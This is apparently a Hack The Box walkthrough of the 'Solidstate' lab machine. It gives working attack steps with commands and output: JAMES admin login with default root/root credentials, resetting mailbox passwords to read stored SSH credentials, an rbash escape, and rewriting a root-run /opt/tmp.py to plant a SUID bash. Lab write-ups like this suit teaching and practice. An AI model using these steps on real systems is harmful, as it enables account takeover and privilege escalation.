Skip to main content

HTB - Solidstate

Solidstate

Basic Nmap scan

Nmap Command: nmap -Pn -n -sC -sV -oA scan_boxs/solidstate/nmap/10.10.10.51-d-scan 10.10.10.51
Nmap scan report for 10.10.10.51
Host is up (0.14s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.15 [10.10.14.15])
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 JAMES pop3d 2.3.2
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
119/tcp open nntp JAMES nntpd (posting ok)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Open ports : 22,25,80,110,119

PORTSERVICEPRODUCTVERSIONEXTRAINFO
22sshOpenSSH7.4p1 Debian 10+deb9u1protocol 2.0
25smtpJAMES smtpd2.3.2
80httpApache httpd2.4.25(Debian)
110pop3JAMES pop3d2.3.2
119nntpJAMES nntpdposting ok

Probing for all open ports with bear-ps
Detecting all ports

scanning the port 4555 with nmap

nmap -Pn -n -sV -sC -p 4555 -oA scan_boxs/solidstate/nmap/solidstate-4555-scan 10.10.10.51
Nmap scan report for 10.10.10.51
Host is up (0.15s latency).

PORT STATE SERVICE VERSION
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:

looks like it JAMES Remote Administration Tool 2.3.2 is running.

Enumerating port: 22

Openssh version helps us guess OS distribution and its series Ubuntu - sid

Enumerating port: 80

alt

found email id: [email protected]
gobuster didn't discover anything interesting.

Enumerating port: 25,110,119,4555

JAMES Mail server is running and enumerating all related ports
searchsploit point at few exploit for JAMES smtpd 2.3.2 version. alt

Analyzing 35513.py gives us a hint for user/password [root/root] for accessing server on port 4555.
User/password

└─$ ncat -nC 10.10.10.51 4555               
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

HELP command list all the available commands

HELP                   
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection

We will listusers and.

listusers   
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Exploit JAMES

Manually exploiting through JAMES Administration port 4555
Reseting passwords for the user and access their emails to look for any breadcrumps

listusers   
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword thomas abcd123
Password for thomas reset
setpassword john abcd123
Password for john reset
setpassword mindy abcd123
Password for mindy reset
setpassword mailadmin abcd123
Password for mailadmin reset

Found password for the user mindy on Email

└─$ ncat -nC 10.10.10.51 110                                    
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS abcd123
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
QUIT

Found user id and password for mindy.

username: mindy
pass: P@55W0rd1!2@

SSH shell as mindy

Logging into the server as mindy
alt

User Flag

alt

Bypass restricted shell

Attempted to change directory but found the shell is restricted.
rbash

Bypass the restricted shell with ssh [email protected] -t "bash --noprofile"
bypass rbash

Privilege escalation

Finding world writable files

find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null

Executing the above the command lists all the world writeable files owned by user or root user.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
/dev/mqueue
/dev/shm
/var/tmp
/opt/tmp.py
/tmp
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/transient
/run/lock
/home/mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$

/opt/tmp.py looks interesting.

Exploit

Analyzing the /opt/tmp.py code, looks like its a simple cleanup code in the tmp directory.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:/$

Attempt to create a test.txt file in /tmp folder and observe if it gets deleted. alt

Updating the file tmp.py file to exploit.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ nano /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('cp /bin/bash /tmp;chown root:root /tmp/bash;chmod 04755 /tmp/bash;')
except:
sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ls
bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ls -la bash
-rwsr-xr-x 1 root root 1265272 Jul 29 23:42 bash

Root Flag

root flag